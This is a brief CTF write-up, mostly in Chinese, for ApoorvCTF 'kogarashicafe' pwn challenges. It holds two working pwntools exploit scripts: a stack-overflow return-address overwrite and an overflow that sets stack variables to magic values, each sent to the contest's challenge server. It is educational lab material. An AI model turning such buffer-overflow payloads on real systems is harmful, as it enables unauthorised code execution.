apoorvctf_wp

kogarashicafe - the first

栈溢出 + 基本ROP

exp:

from pwn import *
import os
context(arch='i386', os='linux', log_level='debug')
if os.environ.get("ZELLIJ") == "0":
    context.terminal = [
        "zellij",
        "action",
        "new-pane",
        "-d",
        "right",
        "-c",
        "--",
        "bash",
        "-c",
    ]

def main():
    addr_brew_coffee = 0x0804856B
    offset = 0x28 + 4
    payload = b"A" * offset + p32(addr_brew_coffee)
    # r = process("./first_visit")
    r = remote("chals1.apoorvctf.xyz", 3001)
    r.sendlineafter("Barista: 'What will you have?'", payload)    
    r.interactive()

if __name__ == "__main__":
    main()

本地

远程

kogarashicafe - the secret

典型的格式化字符串漏洞——泄漏内存

ASCII编码转换，ASCII码在线查询工具

关于字节 小端序 字长 还是需要再研究一下

kogarashicafe - the forbidden recipe

非常简单的栈溢出，入门级签到题

exp：

from pwn import *
import os
context(arch='i386', os='linux', log_level='debug')
if os.environ.get("ZELLIJ") == "0":
    context.terminal = [
        "zellij",
        "action",
        "new-pane",
        "-d",
        "right",
        "-c",
        "--",
        "bash",
        "-c",
    ]

  
def main():
    offset = 0x20
    var_v2 = -557122643 & 0xFFFFFFFF
    var_v3 = 12648243
    payload = b'A' * offset + p32(var_v2) + p32(var_v3)
    # nc chals1.apoorvctf.xyz 3002
    r = remote("chals1.apoorvctf.xyz", 3002)
    # r = process("./forbidden_recipe")
    r.sendlineafter("Barista: 'I remember you... what will it be this time?'\n", payload)
    r.interactive()
  
if __name__ == "__main__":
    main()